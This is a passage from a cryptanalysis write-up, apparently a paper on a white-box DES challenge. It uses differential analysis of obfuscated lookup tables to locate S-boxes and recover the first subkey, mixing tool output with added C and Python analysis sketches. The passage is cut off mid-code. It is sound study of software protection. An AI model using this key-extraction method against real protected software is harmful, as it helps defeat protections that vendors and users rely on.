 0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,
 0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,
 [...]
 0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,
 0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,
},

[...]

unsigned char iBOX_8[12][256] = {
{
 0x13,0xdf,0xf9,0x38,0x61,0xe2,0x44,0x9e,0xc0,0x2a,0x0b,0xb7,0x7c,0xad,
 0x56,0x85,0x96,0xbe,0x8b,0x04,0x27,0xcd,0xa8,0x1f,0xec,0x65,0x39,0xd1,
 0x50,0x42,0x73,0xfa,0x4a,0x52,0x04,0x8b,0xcc,0x2f,0x19,0xad,0x67,0xe3,
 [...]
 0x8a,0x08,0xbd,0x59,0x36,0xf1,0xef,0x45,0x13,0xd4,0x90,0x67,0xae,0x76,
 0x3c,0xf7,0xe4,0x65,0x91,0x43,0x2b,0xcd,0x80,0x58,0xd9,0x1a,0xbf,0x02,
},

[...]
---------------------------------------------------------------------------

    The example shows us that iBOX_3[0] has only 2 possible values: 0xf7
for any index less than or equal to 127 and 0xf1 for the remaining ones.
In other words, this box is a bit filter:

        - High output nibble: only 1 possible value (0xf) => no bit chosen
        - Low output nibble: 2 possible values (0x1, 0x7) => the input's
                             MSB is chosen

    Let's visualize the effect of the first 8 iBox_i for every output
nibble. To see whether the bit at position 'i' is involved in the LUT 'p',
you can compute:

        - p[0]&0xf0 and p[(1<<i)]&0xf0    ; influence on the High nibble
        - p[0]&0x0f and p[(1<<i)]&0x0f    ; influence on the Low nibble

    In each case, if the bit at the position 'i' is indeed involved then
both results will be different. I implemented it in entropy.c
(see appendix):

---------------------------------------------------------------------------
$ ./entropy

[+] Link between IN and OUT arrays
  OUT[0] (high) is composed of:
    -> bit 6
    -> bit 49
    -> bit 57
    -> bit 56
  OUT[0] (low) is composed of:
    -> bit 24
    -> bit 32
    -> bit 40
    -> bit 48
[...]
  OUT[11] (high) is composed of:
    -> bit 7
    -> bit 15
    -> bit 23
    -> bit 31
  OUT[11] (low) is composed of:
    -> bit 14
    -> bit 22
    -> bit 46
    -> bit 54
[+] Total nbr of bits involved = 96
[...]
---------------------------------------------------------------------------

    So the analysis of the first 8 LUTs reveals that each output (OUT[i])
nibble is linked to exactly 4 input bits. So the first 8 iBox_i are no more
than an obfuscated linear mapping.
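
    The test described above, as an added example (this is not the
author's entropy.c; the two tables and all names are constructed). It goes
one step further with an exhaustive variant, because comparing p[0] with
p[1<<i] is only exact when the table is an affine bit mapping behind a
bijective encoding, which is the case of the bit filters discussed here.

```c
#include <stdint.h>
#include <stdio.h>

#define NIB_HIGH 0xf0u
#define NIB_LOW  0x0fu

/* Test from the text: compare entry 0 with entry (1<<i) on one nibble.
 * Returns a mask of the index bits found to influence that nibble. */
unsigned influence_quick(const uint8_t lut[256], unsigned nibble)
{
    unsigned bits = 0;
    for (unsigned i = 0; i < 8; i++)
        if ((lut[0] & nibble) != (lut[1u << i] & nibble))
            bits |= 1u << i;
    return bits;
}

/* Exhaustive variant: bit i matters if flipping it changes the nibble
 * for at least one index. */
unsigned influence_full(const uint8_t lut[256], unsigned nibble)
{
    unsigned bits = 0;
    for (unsigned i = 0; i < 8; i++)
        for (unsigned x = 0; x < 256; x++)
            if ((lut[x] & nibble) != (lut[x ^ (1u << i)] & nibble)) {
                bits |= 1u << i;
                break;
            }
    return bits;
}

/* Constructed table with the shape of the iBOX_3[0] excerpt:
 * 0xf7 for indexes 0..127, 0xf1 for indexes 128..255. */
const uint8_t *filter_table(void)
{
    static uint8_t lut[256];
    for (unsigned x = 0; x < 256; x++)
        lut[x] = (uint8_t)(x <= 127 ? 0xf7 : 0xf1);
    return lut;
}

/* Constructed non-affine table: the low nibble encodes (bit1 AND bit5),
 * so neither bit shows up when it is set alone. */
const uint8_t *and_table(void)
{
    static uint8_t lut[256];
    for (unsigned x = 0; x < 256; x++)
        lut[x] = (uint8_t)(0xf0 | ((((x >> 1) & (x >> 5)) & 1u) ? 0x9 : 0x4));
    return lut;
}

int main(void)
{
    printf("filter table: high=%02x low=%02x\n",
           influence_quick(filter_table(), NIB_HIGH),
           influence_quick(filter_table(), NIB_LOW));
    printf("AND table:    quick=%02x full=%02x\n",
           influence_quick(and_table(), NIB_LOW),
           influence_full(and_table(), NIB_LOW));
    return 0;
}
```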

    A good idea is to focus more specifically on the input bits frequency:

---------------------------------------------------------------------------
$ ./entropy
[...]
[+] Nbr of times a bit is used
  [b_00] 2 [b_01] 1 [b_02] 2 [b_03] 1 [b_04] 2 [b_05] 1 [b_06] 2 [b_07] 1
  [b_08] 2 [b_09] 1 [b_10] 2 [b_11] 1 [b_12] 2 [b_13] 1 [b_14] 2 [b_15] 1
  [b_16] 2 [b_17] 1 [b_18] 2 [b_19] 1 [b_20] 2 [b_21] 1 [b_22] 2 [b_23] 1
  [b_24] 2 [b_25] 1 [b_26] 2 [b_27] 1 [b_28] 2 [b_29] 1 [b_30] 2 [b_31] 1
  [b_32] 2 [b_33] 1 [b_34] 2 [b_35] 1 [b_36] 2 [b_37] 1 [b_38] 2 [b_39] 1
  [b_40] 2 [b_41] 1 [b_42] 2 [b_43] 1 [b_44] 2 [b_45] 1 [b_46] 2 [b_47] 1
  [b_48] 2 [b_49] 1 [b_50] 2 [b_51] 1 [b_52] 2 [b_53] 1 [b_54] 2 [b_55] 1
  [b_56] 2 [b_57] 1 [b_58] 2 [b_59] 1 [b_60] 2 [b_61] 1 [b_62] 2 [b_63] 1
$
---------------------------------------------------------------------------

    The even bits are used exactly twice while odd ones are only used once
(here odd and even both refer to the position). Or you could say that even
bits are duplicated in the internal state built after this step.

    Anybody familiar with the DES knows that the IP(X) function of the DES
gives the internal state L || R where:

    - L is an array composed of the odd bits of X
    - R is an array composed of the even bits of X

    In an academic WB DES implementation, building the 96 bits state is
performed using the duplication of even bits (R). This is because these
bits are necessary as both input of the E-box and output of the DES round
function (see my previous description of DES). So we have an obvious match
and it's a clear indication that there is no external encoding applied to
the input (and as a consequence probably none applied to the output as
well). More precisely there could still be a bit permutation on both L & R
bits but it sounds like a silly hypothesis so let's forget about that.
What would be the point?

                                    ---

   Now let's continue with the differential analysis of the full wb_init().
This step is much more intuitive. Think about it: if you want to discover
the nibbles of stage0 (the output of wb_init) influenced by a specific
input bit then apply wb_init() to two inputs whose only difference is this
bit. Then calculate the XOR of both results and the non null nibbles are
the ones which are affected. This was greatly inspired by [R09].

---------------------------------------------------------------------------
$ ./entropy
[...]
[+] Differential cryptanalysis on wb_init()
    -> b_00 :: 00 04 20 00 00 00 00 00 00 00 00 00
    -> b_01 :: 00 00 00 40 00 00 00 00 00 00 00 00
    -> b_02 :: 00 00 00 09 d0 00 00 00 00 00 00 00
    -> b_03 :: 00 00 00 00 00 00 00 90 00 00 00 00
    -> b_04 :: 00 00 00 00 00 0e 60 00 00 00 00 00
    -> b_05 :: 00 00 00 00 00 00 00 00 00 50 00 00
    -> b_06 :: 80 00 00 00 00 00 00 05 00 00 00 00
    -> b_07 :: 00 00 00 00 00 00 00 00 00 00 00 b0
    -> b_08 :: 00 07 00 00 00 00 00 00 01 00 00 00
    -> b_09 :: 00 00 00 f0 00 00 00 00 00 00 00 00
    -> b_10 :: 00 00 00 06 00 00 00 00 00 03 00 00
[...]
---------------------------------------------------------------------------

    So for even bits there are 2 nibbles affected and only one for odd
bits. Not only does it confirm our previous hypothesis but it also reveals
the position (the index in the nibble array) of the bits in the WB internal
state (up to 1/2 probability for even bits). This is particularly
interesting when it comes to locating S-boxes for example ;-)
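
    The same differential, reproduced on a toy stand-in for wb_init() as
an added example (not the author's entropy.c and not the challenge's
tables: the bit layout, the nibble encodings and all names are
constructed). It shows why bijective nibble encodings do not hide which
nibbles a given input bit reaches.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Fixed 4-bit permutation used to build the nibble encodings (constructed). */
static const uint8_t PERM[16] = { 14, 4, 13, 1, 2, 15, 11, 8,
                                   3, 10, 6, 12, 5, 9, 0, 7 };

/* Input bit feeding state bit k (0..95): every input bit once, then the
 * 32 even bits a second time. Constructed layout, not the challenge's. */
static unsigned source_bit(unsigned k)
{
    if (k < 64)
        return (37u * k + 11u) % 64u;
    return 2u * ((5u * (k - 64u) + 3u) % 32u);
}

static unsigned get_bit(const uint8_t in[8], unsigned i)
{
    return (in[i / 8] >> (i % 8)) & 1u;
}

/* Toy stand-in for wb_init(): 64 bits in, 24 encoded nibbles (12 bytes) out. */
void toy_init(const uint8_t in[8], uint8_t out[12])
{
    memset(out, 0, 12);
    for (unsigned n = 0; n < 24; n++) {
        unsigned v = 0;
        for (unsigned b = 0; b < 4; b++)
            v = (v << 1) | get_bit(in, source_bit(4 * n + b));
        unsigned enc = PERM[(5u * v + n) & 15u];    /* per-nibble bijection */
        out[n / 2] |= (uint8_t)((n & 1u) ? enc : enc << 4);
    }
}

/* Flip input bit i, XOR both outputs into delta (may be NULL) and return
 * the number of non-null nibbles. */
int diff_on_bit(unsigned i, uint8_t *delta)
{
    uint8_t a[8] = { 0 }, b[8] = { 0 }, ya[12], yb[12], tmp[12];
    int hit = 0;

    if (!delta)
        delta = tmp;
    b[i / 8] ^= (uint8_t)(1u << (i % 8));
    toy_init(a, ya);
    toy_init(b, yb);
    for (int j = 0; j < 12; j++) {
        delta[j] = (uint8_t)(ya[j] ^ yb[j]);
        hit += (delta[j] & 0xf0) != 0;
        hit += (delta[j] & 0x0f) != 0;
    }
    return hit;
}

/* 1 if every even bit touches 2 nibbles and every odd bit touches 1. */
int duplication_pattern_holds(void)
{
    for (unsigned i = 0; i < 64; i++)
        if (diff_on_bit(i, NULL) != ((i & 1u) ? 1 : 2))
            return 0;
    return 1;
}

int main(void)
{
    uint8_t delta[12];
    for (unsigned i = 0; i < 8; i++) {
        int n = diff_on_bit(i, delta);
        printf("-> b_%02u ::", i);
        for (int j = 0; j < 12; j++)
            printf(" %02x", delta[j]);
        printf("  (%d nibbles)\n", n);
    }
    printf("even=2 / odd=1 pattern holds: %d\n", duplication_pattern_holds());
    return 0;
}
```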


                       Analyzing the first wb_round()
                       ------------------------------


    To analyze this function, one clever trick is to make use of the odd
bits (L0) and perform a differential analysis.

    Natively, the DES satisfies the following system of equations:

        L1 = R0
        R1 = L0 [+] f(R0,K0)

        With
            L0 || R0 being the result of IP(plaintext)
            K0 being the first subkey

    Let's now consider two plaintexts (A and B). The first one is composed
of bits all set to 0 (L0_A || R0_A) whereas the second one (L0_B || R0_B)
has a weight of 1 and more specifically, its sole bit set to 1 is in L0.

    Remark: While there is only one A, there are obviously 32 possible B.

    We can thus write thanks to the previous equations:

        L1_A = R0_A = 0
        R1_A = L0_A [+] f(R0_A,K0) = f(0,K0)

    And

        L1_B = R0_B = 0
        R1_B = L0_B [+] f(R0_B,K0) = L0_B [+] f(0,K0)

                (Again please excuse the lazy notation)

    This finally gives us:

        DELTA(L1||R1)(A,B) =  ( L1_A [+] L1_B || R1_A [+] R1_B )
                           =  ( 0 [+] 0 || f(0,K0) [+] L0_B [+] f(0,K0) )
                           =  ( 0 || L0_B )

    We know that L0_B's weight is 1 so in a native DES the modification of
one bit in L0 induces the modification of a unique bit in the output of the
DES round function. In an obfuscated context, this means that only one
output nibble is modified and calculating DELTA (the result of the so
called differential analysis if you prefer) is merely a trick to identify
it easily.

    Now that you've grasped the main idea, let's work on the real WB. Again
consider plaintexts A and B which give (L0_A || R0_A) and (L0_B || R0_B)
after IP().

    Because wb_round() includes the E-box and produces a 96 bits output
state, we now have to consider an additional transformation:

    X (64b) ---> [ wb_init + first wb_round ] ----> Y (96b)

    Here Y is the output of wb_round. Following the design in academic
publications we can write:

    Y = RP ( L1 || X1 || r1 )     (RP = Random bit Permutation used to hide
                                        the position of bits in the
                                        obfuscated output.)

    With:
        - L1 being R0 (from DES round equation)
        - X1 being the result of the E-box applied to R1
        - r1 being the complementary bits such as the set of X1 and r1 is
          exactly twice R1

    Now let's apply again the differential analysis. It's important to
remark that RP() and E() are both linear operations as this simplifies
things. Indeed it's well known that:

        LinearFunc(x [+] y) = LinearFunc(x) [+] LinearFunc(y)

    Putting everything together this gives us:

        DELTA(Y)(A,B) = RP(Y_A) [+] RP(Y_B)
                      = RP(Y_A [+] Y_B)
                      = RP(L1_A [+] L1_B || X1_A [+] X1_B
                                         || r1_A [+] r1_B)
                      = RP(0 [+] 0 || E(f(0,K0)) [+] E(L0_B [+] f(0,K0))
                                   || r1_A [+] r1_B)
                      = RP(0 || E(f(0,K0) [+] L0_B [+] f(0,K0))
                             || r1_A [+] r1_B)
                      = RP(0 || E(L0_B) || r1_A [+] r1_B)

    If the bit set in L0 is a middle bit then:
        - Weight(E(L0_B)) = 1 and Weight(r1_A [+] r1_B) = 1
    If the bit set in L0 isn't a middle bit then:
        - Weight(E(L0_B)) = 2 and Weight(r1_A [+] r1_B) = 0

    In both cases, Weight(RP(0 || E(L0_B) || r1_A [+] r1_B)) = 2, RP having
no effect on the weight since it only permutes bits. This means that 1 bit
modification should have a visible impact on 'at most' 2 nibbles. 'at most'
and not 'exactly' because with the effect of RP() the two bits could be
located in the same nibble.

    Let's see if we are right:

---------------------------------------------------------------------------
   b_01 :: 00 05 d0 00 00 00 00 00 00 00 00 00  <-- 2 modified nibbles
   b_03 :: 00 00 00 03 60 00 00 00 00 00 00 00  <-- 2 modified nibbles
   b_05 :: 00 00 00 00 00 04 e0 00 00 00 00 00  <-- 2 modified nibbles
   b_07 :: 90 00 00 00 00 00 00 08 00 00 00 00  ...
   b_09 :: 00 0b 00 00 00 00 00 00 05 00 00 00
   b_11 :: 00 00 00 0f 00 00 00 00 00 08 00 00
   b_13 :: 00 00 00 00 00 0d 00 00 00 00 0f 00
   b_15 :: 00 00 00 00 00 00 00 0f 00 00 00 06
   b_17 :: 00 04 00 00 00 00 00 00 0c 00 00 00
   b_19 :: 00 00 00 09 00 00 00 00 00 0f 00 00
   b_21 :: 00 00 00 00 00 08 00 00 00 00 06 00
   b_23 :: 00 00 00 00 00 00 00 0d 00 00 00 08
   b_25 :: 08 d0 00 00 00 00 00 00 00 00 00 00
   b_27 :: 00 00 04 20 00 00 00 00 00 00 00 00
   b_29 :: 00 00 00 00 05 80 00 00 00 00 00 00
   b_31 :: 00 00 00 00 00 00 04 20 00 00 00 00
   b_33 :: 02 70 00 00 00 00 00 00 00 00 00 00
   b_35 :: 00 00 0c f0 00 00 00 00 00 00 00 00
   b_37 :: 00 00 00 00 0d b0 00 00 00 00 00 00
   b_39 :: 00 00 00 00 00 00 0f a0 00 00 00 00
   b_41 :: 0c 00 00 00 00 00 00 00 0f 00 00 00
   b_43 :: 00 00 0d 00 00 00 00 00 00 02 00 00
   b_45 :: 00 00 00 00 09 00 00 00 00 00 05 00
   b_47 :: 00 00 00 00 00 00 03 00 00 00 00 03
   b_49 :: 0f 00 00 00 00 00 00 00 0d 00 00 00
   b_51 :: 00 00 06 00 00 00 00 00 00 03 00 00
   b_53 :: 00 00 00 00 0b 00 00 00 00 00 0c 00
   b_55 :: 00 00 00 00 00 00 02 00 00 00 00 01
   b_57 :: b0 00 00 00 00 00 00 0c 00 00 00 00
   b_59 :: 00 03 60 00 00 00 00 00 00 00 00 00
   b_61 :: 00 00 00 0e 40 00 00 00 00 00 00 00
   b_63 :: 00 00 00 00 00 0b f0 00 00 00 00 00
---------------------------------------------------------------------------

    And that's exactly what we were expecting :) Well to be honest, I first
observed the result of the differential analysis, then remarked a 'strange'
behavior related to the odd bits and finally figured out why using maths ;)

   One cool thing with this situation is that we can easily leak the
position of the specific S-Boxes inside the T-Boxes. First let's compare
the differential analysis of even bits 28,36,52,60 and of odd bit 1:

---------------------------------------------------------------------------
   b_01 :: 00 05 d0 00 00 00 00 00 00 00 00 00
   b_28 :: 0d 75 dd 00 00 00 04 20 0f d2 00 00
   b_36 :: 0c 05 d0 00 09 00 04 20 cf 00 05 00
   b_52 :: 00 05 d0 09 00 00 00 00 90 0f 00 00
   b_60 :: 0c 05 d6 09 00 00 02 00 3f 0d 00 01
---------------------------------------------------------------------------

    Obviously setting these even bits one by one induces the same
modification (amongst others) as setting the odd bit 1 (nibbles 01L (0x5)
and 02H (0xd)) so there must be some kind of mathematical link between them
because the other bits do not have such a property.


                             Playing with Sbox
                             ------------------


    The reason behind this behavior is very simple to explain. But first,
let's go back to the example of plaintext 'A' (null vector):

    We know that:

    R1_A = L0_A [+] P(S1[0 [+] k0] || S2[0 [+] k1] || ... || S8[0 [+] k7])
    R1_A = 0    [+] P(S1[k0]       || S2[k1]       || ... || S8[k7])
    R1_A = P( S1[k0] || S2[k1] || ... || S8[k7] )

    Where:
        The ki being 6 bits vectors (0 <= i < 8)
        K0 = k0 || k1 || k2 ... || k7

    Thus in the case of plaintext 0 (A), R1_A is the permutation of the
Sbox output whose inputs are the bits of the first subkey.

    Now let us focus on 1 of the 4 bits generated by an Sbox S (which could
be any of the 8). We do not know its value (b) but when the P-box is
applied it will be located in a particular nibble as illustrated below:


    R1_A = f(R0,K0) = ???? ?b?? ???? ???? ???? ???? ???? ????

                            ^
                            |__  The bit

                      <------------------------------------->
                            (4bits x 8) = 32 bits state


    Because a WB DES implementation is working with a duplicated Rx this
will give us the following internal state:

               ... ??b? ???? ???? ???b ...

                     ^               ^
                     |               |
                     --------------------  b is duplicated

               <------------------------->
                         96 bits state


    Now following what was explained previously with odd bits, out of the
32 possible B, one of them will affect b when L0_B is XORed with f(0,K0).

    So considering a 96 bits internal state inside the WB, this gives us:

               ... ??a? ???? ???? ???a ...

               With:
                   a = b [+] 1

    As a result, the differential between A and B would be:

               ... ??b? ???? ???? ???b ...   (from A)

                          [+]

               ... ??a? ???? ???? ???a ...   (from B)

                           =

               ... ??1? ???? ???? ???1 ...  ( because a [+] b
                                                    = a [+] a [+] 1
                                                    = 1             )

    From now on, we will call this differential our 'witness' and by
extension, the two nibbles where b=1 the 2 witness nibbles.


                         Playing with the witness
                         ------------------------


    Now imagine that we're using another plaintext (X) with weight 1 and
whose weight is in one of the 6 possible bits influencing Sbox S. There are
two possible situations:

        - S still produces b
        - S now produces b [+] 1

    If we perform a differential analysis between X and A (null vector)
this gives us:

    case 1:
    =======

               ... ??b? ???? ???? ???b ...   (from A)

                          [+]

               ... ??b? ???? ???? ???b ...   (from X)

                           =

               ... ??0? ???? ???? ???0 ...   <-- useless output

    case 2:
    =======

               ... ??b? ???? ???? ???b ...   (from A)

                          [+]

               ... ??a? ???? ???? ???a ...   (from X)

                           =

               ... ??1? ???? ???? ???1 ...   <-- witness vector :)))


    So case 2 is perfect because it gives us a distinguisher. We can test
all 32 possible X (each of them having a different even bit set) and
observe the ones which produce the witness vector associated with b.

    This is exactly what we did implicitly when we discovered the link
between bits 28, 36, 52 and 60. Or if you're lost let's say that we've just
discovered something huge: the bits 28, 36, 52 and 60 are the input of the
same Sbox and bit 1 is one of the outputs of this Sbox. At this point the
protection took a heavy hit.

    Remark: The first subkey is modifying the input sent to the Sbox. As a
consequence the relation previously found is "key dependent". This will be
of importance later, keep reading!


                               Going further
                               -------------


    Let's think. At this point and thanks to our analysis of wb_init()
we're almost sure that there is no external encoding applied to the input.
So there should be a match between our practical results and the
theoretical relations in the original DES algorithm. To verify my theory, I
wrote a little script to compute the positions of the bits involved with
each Sbox:

---------------------------------------------------------------------------
$ ./bitmapping.py
 [6, 56, 48, 40, 32, 24]    <-- Sbox 1
 [32, 24, 16, 8, 0, 58]     <-- Sbox 2
 [0, 58, 50, 42, 34, 26]
 [34, 26, 18, 10, 2, 60]
 [2, 60, 52, 44, 36, 28]    <-- Sbox 5
 [36, 28, 20, 12, 4, 62]
 [4, 62, 54, 46, 38, 30]
 [38, 30, 22, 14, 6, 56]    <-- Sbox 8
---------------------------------------------------------------------------

    Oh interesting so Sbox 5 seems to match with our practical result.
Going deeper, we need to check if bit 01 is involved with this Sbox. Again
I wrote another script to compute the position of odd bits involved with
the Sbox in the original DES and this gives us:

---------------------------------------------------------------------------
$ ./sbox.py | grep 'SBOX 5'
    bit 41 XORED with bit 00 of SBOX 5 (19)
    bit 01 XORED with bit 03 of SBOX 5 (16)
    bit 19 XORED with bit 02 of SBOX 5 (17)
    bit 63 XORED with bit 01 of SBOX 5 (18)
---------------------------------------------------------------------------

    So bit 01 is indeed involved. However let's try to be careful. In
cryptanalysis it's easy to be fooled, so let's make extra checks. For
example can we link a subset of even bits {2, 28, 36, 44, 52, 60} with bit
19 of the same Sbox?

---------------------------------------------------------------------------
        19 :: 00 00 00 09 00 00 00 00 00 0f 00 00
         2 :: 0c 00 06 00 00 0b f2 60 0f 03 00 01
        28 :: 0d 75 dd 00 00 00 04 20 0f d2 00 00
        36 :: 0c 05 d0 00 09 00 04 20 cf 00 05 00
        44 :: 00 00 00 09 00 0b f0 00 20 0f 00 00
        52 :: 00 05 d0 09 00 00 00 00 90 0f 00 00
        60 :: 0c 05 d6 09 00 00 02 00 3f 0d 00 01
---------------------------------------------------------------------------

    Bit 19 is linked to bit 44 and 52 => YES. At this point, we should
check automatically that the bit relations are satisfied for all the Sbox
but it's tedious. That's the problem :-P Because I was lazy, I manually
checked all the relations. Fortunately with the help of scripts, this only
took me a couple of minutes and it was a 100% match. Again, this proves
nothing but as I said earlier, we're working with guesses.


         Towards a perfect understanding of differential analysis
         --------------------------------------------------------


    Didn't you notice something particular with bit 02, 28 and 60? Well the
'impacted' nibbles were neither 0 nor a witness nibble. For example
consider bit 60:

---------------------------------------------------------------------------
        19 :: 00 00 00 09 00 00 00 00 00 0f 00 00
        60 :: 0c 05 d6 09 00 00 02 00 3f 0d 00 01
---------------------------------------------------------------------------

    The first impacted nibble '0x9' is a good one (witness nibble) but the
second one is neither '0x0' nor '0xf' (witness). How is that possible?

    Well the answer lies in both:
        - the (non)-middle bits
        - the P-box

    Indeed if you consider the bits sent to Sbox 5, you have to know that:
        - bits 02 and 60 are sent to both Sbox 4 & 5
        - bits 52 and 44 are sent to Sbox 5
        - bits 36 and 28 are sent to both Sbox 5 & 6

    So when 1 non-middle bit is set, this will impact the output of 2
S-boxes and, as we're unlucky, the P-box has the unfortunate effect of
placing their bits in the same nibble, hence the difference observed.
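
    Added example, not part of the original paper: bitmapping.py and
sbox.py are not printed above, so this Python 3 sketch recomputes both
mappings from the published DES tables IP, E and P. It assumes bits are
numbered from 0 starting at the first (most significant) bit of the block,
which is the numbering the outputs above agree with; all function names are
hypothetical.

```python
# Standard DES tables (FIPS 46-3), 1-indexed as published.
IP = [58, 50, 42, 34, 26, 18, 10, 2, 60, 52, 44, 36, 28, 20, 12, 4,
      62, 54, 46, 38, 30, 22, 14, 6, 64, 56, 48, 40, 32, 24, 16, 8,
      57, 49, 41, 33, 25, 17, 9, 1, 59, 51, 43, 35, 27, 19, 11, 3,
      61, 53, 45, 37, 29, 21, 13, 5, 63, 55, 47, 39, 31, 23, 15, 7]
E = [32, 1, 2, 3, 4, 5, 4, 5, 6, 7, 8, 9,
     8, 9, 10, 11, 12, 13, 12, 13, 14, 15, 16, 17,
     16, 17, 18, 19, 20, 21, 20, 21, 22, 23, 24, 25,
     24, 25, 26, 27, 28, 29, 28, 29, 30, 31, 32, 1]
P = [16, 7, 20, 21, 29, 12, 28, 17, 1, 15, 23, 26, 5, 18, 31, 10,
     2, 8, 24, 14, 32, 27, 3, 9, 19, 13, 30, 6, 22, 11, 4, 25]


def l0_source(pos):
    """Plaintext bit (0-indexed) that IP moves to position pos of L0."""
    return IP[pos] - 1


def r0_source(pos):
    """Plaintext bit (0-indexed) that IP moves to position pos of R0."""
    return IP[32 + pos] - 1


def sbox_inputs(n):
    """Plaintext bits reaching the 6 inputs of S-box n (1..8) in round 1."""
    return [r0_source(E[6 * (n - 1) + j] - 1) for j in range(6)]


def sbox_outputs(n):
    """(L0 plaintext bit, S-box output bit, pre-P index) for S-box n.

    After P, each S-box output bit is XORed with exactly one bit of L0.
    Output bit 3 is the most significant bit of the S-box value.
    """
    rows = []
    for pos, src in enumerate(P):      # P output position pos takes bit src
        pre_p = src - 1
        if pre_p // 4 == n - 1:
            rows.append((l0_source(pos), 3 - pre_p % 4, pre_p))
    return rows


def sboxes_fed_by(bit):
    """S-boxes whose round-1 input contains this (even) plaintext bit."""
    return [n for n in range(1, 9) if bit in sbox_inputs(n)]


def expansion_copies(odd_bit):
    """Copies E makes of the R1 bit this L0 bit is XORed into.

    1 for a 'middle' bit, 2 otherwise (the Weight(E(L0_B)) of the text).
    """
    pos = IP[:32].index(odd_bit + 1)
    return E.count(pos + 1)


if __name__ == "__main__":
    for n in range(1, 9):
        print(sbox_inputs(n), "<-- Sbox", n)
    for bit, out, idx in sbox_outputs(5):
        print("bit %02d XORED with bit %02d of SBOX 5 (%d)" % (bit, out, idx))
    for bit in sbox_inputs(5):
        print("bit %02d feeds Sbox" % bit, sboxes_fed_by(bit))
```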


----[ 6.3 - Recovering the first subkey


    If the relations observed are 'key dependent', considering the fact
that the S-Boxes are known (which means unmodified otherwise this would be
cheating :p) then isn't this an indirect leak on the key itself that could
be transformed into a key recovery? Oh yes it is :-)


                            First cryptanalysis
                            -------------------


    The main idea is really simple: we know that for a given subkey,
several unitary vectors (plaintexts of weight 1) will produce the same
output bit.

    Let's take again the previous case. We have:


                  .------.------.------.-----.-----.------.
                  | b_02 | b_60 | b_52 |b_44 |b_36 | b_28 |
                  '------'------'------'-----'-----'------'
                                    .....
                                    . + .
                                    .....
                  .------.------.------.-----.-----.------.
                  | k24  | k25  | k26  | k27 | k28 | k29  |
                  '------'------'------'-----'-----'------'
                                      |
                                      v
                            *********************
                            *       Sbox 5      *
                            *********************
                                      |
                                      v
                        .------.------.------.-----.
                        |  y0  |  y1  |  y2  | y3  |
                        '------'------'------'-----'


   Let us consider bit 01. We know that it will be XORed to y2 so from the
differential analysis we can derive the set of relations:

[ k24 [+] 0, k25 [+] 1, k26 [+] 0, k27 [+] 0, k28 [+] 0, k29 [+] 0 ] => b
[ k24 [+] 0, k25 [+] 0, k26 [+] 1, k27 [+] 0, k28 [+] 0, k29 [+] 0 ] => b
[ k24 [+] 0, k25 [+] 0, k26 [+] 0, k27 [+] 0, k28 [+] 1, k29 [+] 0 ] => b
[ k24 [+] 0, k25 [+] 0, k26 [+] 0, k27 [+] 0, k28 [+] 0, k29 [+] 1 ] => b

   So amongst all possible sets {k24,k25,k26,k27,k28,k29}, only a few of
them (including the one from the real subkey) will satisfy the relations.
Testing all possible sets (there are 2^6 = 64 of them) will give us 2 lists
because we do not know if b=1 or b=0 so we have to consider both cases.

   Applying this technique to each of y0, y1, y2 and y3 allows us to filter
efficiently the number of possible candidates as we will only consider
those present in all lists. The success of this cryptanalysis is highly
dependent on the number of relations that we will be able to create for a
particular S-Box. Practically speaking, this is sufficient to recover the
first subkey as the complexity should be far below 2^48. Should be? Yes I
didn't test it... I found even better.


                         Immediate subkey recovery
                         -------------------------


    As I said above, our success is dependent on the number of equations so
improving the cryptanalysis can be done by finding ways to increase this
number. There are two obvious ways to do that:

        - There may exist combinations of input bits other than unitary
          vectors (weight > 1) which can produce the witness nibbles in a
          differential analysis.
        - If the impacted nibbles are both 0x0 then this gives us a new
          relation where the expected output bit is b [+] 1

   Practically speaking this gives us the following result for Sbox5 and
bit 01:

---------------------------------------------------------------------------
$ ./exploit
[...]
        { 1 0 0 0 0 0 } = { 1 }   <-- dumping relations for S5 & bit 01
        { 0 1 0 0 0 0 } = { 0 }
        { 1 1 0 0 0 0 } = { 0 }
        { 0 0 1 0 0 0 } = { 0 }
        { 1 0 1 0 0 0 } = { 1 }
        { 0 1 1 0 0 0 } = { 1 }
        { 1 1 1 0 0 0 } = { 1 }
        { 0 0 0 1 0 0 } = { 1 }
        { 1 0 0 1 0 0 } = { 0 }
        { 0 1 0 1 0 0 } = { 0 }
        { 1 1 0 1 0 0 } = { 1 }
        { 0 0 1 1 0 0 } = { 1 }
        { 1 0 1 1 0 0 } = { 0 }
        { 0 1 1 1 0 0 } = { 1 }
        { 1 1 1 1 0 0 } = { 0 }
        { 0 0 0 0 1 0 } = { 0 }
        { 1 0 0 0 1 0 } = { 1 }
        { 0 1 0 0 1 0 } = { 0 }
        { 1 1 0 0 1 0 } = { 0 }
        { 0 0 1 0 1 0 } = { 1 }
        { 1 0 1 0 1 0 } = { 0 }
        { 0 1 1 0 1 0 } = { 0 }
        { 1 1 1 0 1 0 } = { 1 }
        { 0 0 0 1 1 0 } = { 0 }
        { 1 0 0 1 1 0 } = { 0 }
        { 0 1 0 1 1 0 } = { 1 }
        { 1 1 0 1 1 0 } = { 0 }
        { 0 1 0 1 0 1 } = { 1 }

[...]

        [ key candidate is 31]
---------------------------------------------------------------------------

    Cryptanalysts have the habit of always evaluating the complexity of
their attacks but in this case let's say that it's useless. Only one subkey
appeared to be valid out of the 2^48 possible ones.
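
    Added example, not the author's exploit: the relations dumped above fed
to a candidate filter over the standard S5 table, in Python 3. It assumes
that the six columns are the S-box input bits in the order of the diagram
(b_02 first), that the right-hand value is 1 when no witness is seen and 0
when the output bit flips, and that bit 01 is tied to the most significant
output bit of S5; all function names are hypothetical.

```python
# Standard DES S-box 5 (FIPS 46-3): 4 rows of 16 values.
S5 = [[2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9],
      [14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6],
      [4, 2, 1, 11, 10, 13, 7, 8, 15, 9, 12, 5, 6, 3, 0, 14],
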